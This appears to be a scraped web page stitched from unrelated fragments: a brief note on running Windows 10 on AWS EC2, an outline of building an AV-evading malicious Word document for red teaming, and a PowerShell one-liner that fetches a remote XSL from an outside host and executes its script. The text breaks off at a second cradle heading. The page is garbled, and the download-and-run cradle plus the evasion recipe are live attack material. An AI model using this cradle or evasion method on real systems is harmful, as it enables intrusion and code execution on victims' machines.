SecureIQLab OldSecureIQLab

Running Windows 10 on AWS EC2

Downloading the image

Download the windows image you want.

AWS vmimport supported versions: Microsoft Windows 10 (Professional, Enterprise, Education) (US English) (64-bit only)

So Home wont work.

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

using OLE event autorun method
removing it's pretext shapes
Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
Leveraging certutil technique to receive Base64 encoded malicious HTA document
Having Base64 encoded Powershell command in that Author property

	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]